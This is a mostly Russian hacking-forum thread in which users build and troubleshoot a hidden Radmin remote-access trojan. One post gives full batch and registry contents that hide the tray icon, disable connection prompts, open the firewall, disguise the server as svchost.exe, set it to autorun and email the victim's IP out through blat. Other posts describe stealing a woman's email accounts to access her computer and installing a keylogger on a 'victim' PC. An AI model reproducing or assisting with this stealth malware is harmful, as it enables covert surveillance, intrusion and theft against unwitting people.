может это больше прояснит возожные варианты решения моего вопроса?

2. и еще вопрос...
что значит изнутри сети подключиться к нему... т.е.е через другого клиента их общажного инета?

+-ы уже поставил, тебе итак большой респект от всех, я думаю))

Ну вот как раз Внешний IP: 212.45.8.212 - это ИП прокси-сервера (который им раздает инет)
127.0.0.1 - локальный ип любого компа, независимо подключен он к сети или нет (исп. к примеру для тестирования скриптов на локальном веб-сервере)

Изнутри сети - значит идешь в общагу к ней, узнаешь ее локальный адрес, заходишь в другую комнату (в которой есть сеть), коннектишь ноут и под ключаешься через локальную сеть к ней. Если ноута нету - используй первый попавшийся комп из ее локалки.

nez0rF правильно говорит - то, что выдает тебе квип - это не ее ИП, а ИП сервера. Квип выдаст тебе этот же ИП если ты будешь пересылать кому-то файл из ее же сети (при условии, конечно, что тот кому ты будешь пересылать использует тот же сервер что и она).

Итог: извне ты не сможешь подключиться, надо только топать к ее соседям, у которых тоже есть локалка и пробовать коннектится оттуда

млин, короче я все понял)) спасибо всем!!
IP точно этот, т.к. с него приходит почта по мылу, все ее мыла уже в моем распоряжении

ок, притащу туда ноут и буду пробовать

всем привет .
я ламер и поэтому прошу у вас помощи .
скачал серва с http://www.filehoster.ru/files/bx3443 . но он палится антивирем и в процессах есть .
если не трудно дайте собранный сервер радмина версии 3.0 (т.к. он вроде как антивирусами не обнаруживатся или что!?)
1. чтоб небыло иконки
2. чтоб скинывал IP на мыло (я так понял это pinch делает )
3. непалился антивирем
4. небыло в процессах .
и подскажите куда в файле install вводить пароль .
т.е. как я понял это тоже самое что я скачал ток 3 версия + батник с други кодом .
заранее псб за содействие .

едит. не знаю почему, слеши не отображаются (кое-где). на самом деле они там есть.

привет, онтечад.
сделал свою сборку радмина. тестил на себе, пашет (дада, можно подключаться к себе хД) на других нет (пока тестил на двух). может всё же что-то у меня со сборкой? содержимое sfx архива: 111.bat
111.reg
run.bat

admdll.dll
raddrv.dll
svchost.exe
_
blat.exe |
blat.dll ---- файлы консольного мейл клиента
blat.lib _|

hidcon.exe - прекрасная вещичка, которая ПОЛНОСТЬЮ скрывает выполнение батника (синтаксис очень простой: hidcon.exe [имя_батника].bat)

содержимое файла 111.bat:

blat.exe -install -server smtp.yandex.ru -port 587 -f моё_мыло@yandex.ru -u мой_логин -pw мой_пароль
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg import 111.reg regedit /s 111.reg "%SYSTEMROOT%/svchost.exe" /install /silence
hidcon.exe run.bat

содержимое run.bat:


ipconfig >> C:\WINDOWS\system32\ip.txt
netsh firewall add allowedprogram "%SYSTEMROOT%\svchost.exe" "SVCHOST" ENABLE
"%SYSTEMROOT%\svchost.exe" /start
blat.exe C:\\WINDOWS\system32\ip.txt -to моё_мыло2@yandex.ru
erase C:\\WINDOWS\\system32\\ip.txt
exit

содержимое 111.reg


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin]

[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0]

[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server]

[HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\v2.0\\Server\\ip list]

[HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\\v2.0\\Server\\P arameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\RAdmin\\v1.01\\ViewT ype]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4, b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows \CurrentVersion\\Run]
"svchost"="C:\\WINDOWS\\hidcon.exe run.bat"

меня уже достал этот секас...что не так??? у меня всё пашет вроде, айпи норм присылается от других, а вот коннекта нет...

вот кстати, если кому надо, та самая hidcon.exe
http://www.sharing.ru/dl/018936/hidcon.exe.html

удалось более прояснить ситуацию. поставил скрытого радмина себе, пошёл к другу, коннекта нет (хотя сам к себе могу). поставил ему сервер - он сам к себе может, я к нему нет. у всех испытуемых адсл (и у меня)

PenSpinner, а почему должен быть коннект? Комманда ipconfig не даёт тебе внешнего IP.

воот, огромное спасибо.

может я туплю но подскажите , пароль в параметре указывается ,а чтоб его ввести нужно числа в хекс , так ведь !? и подскажите что сделать чтобы небыло в процессах видно .

выбираешь в настройках другой пароль, потом смотришь как он выглядит в реестре

PenSpinner, а почему должен быть коннект? Комманда ipconfig не даёт тебе внешнего IP.
почему тогда тот ип, который я вижу у себя в ipconfig совпадает с тем, который я вижу в логах сниффера, по которому зашёл?

Hello,
I make some test this days can some help me with this problem I install radmin and I want to use Ardamax Keylogger (NOD32 don't detect it live virus) i make remote installation and transfer it on VICTIM machine but when I try to run it from telnet session it freeze.
If I open computer with remote management go to c:\Workign.exe with mouse and click twice keylogger is install correctly and working but I need to do it from command line.
I try with "nc" same shit

10x for all helping greetings

RADMIN
http://img4.imageshack.us/img4/3425/screenshotlg0.th.jpg (http://img4.imageshack.us/my.php?image=screenshotlg0.jpg)

HERE IS MY TELNET SESSION
http://img17.imageshack.us/img17/1245/screenshot1xz5.th.jpg (http://img17.imageshack.us/my.php?image=screenshot1xz5.jpg)

WHAT HAPPENED WHEN I RUN " telnet Working.exe" i get FREEZE proccess
http://img218.imageshack.us/img218/8877/screenshot2hi4.th.jpg (http://img218.imageshack.us/my.php?image=screenshot2hi4.jpg)

вкинул. при подключении ввожу пароль (вроде как должно работать), начинает соеденяться и обрыв... но это только при полном доступе и в режиме просмотра. при обмене файлов - нормально.
что может быть, не подскажете?

I don't understand you very well because I translate your text but ... .
for what password you ask .... in fact when restart machine it may work I don't know why process freeze

1.When connect enter password ... for what password you talk.

- I upload and install radmin on victim PC

I need to upload keylogger and run it from RAdmin telnet sessions

Greetings
10x for helping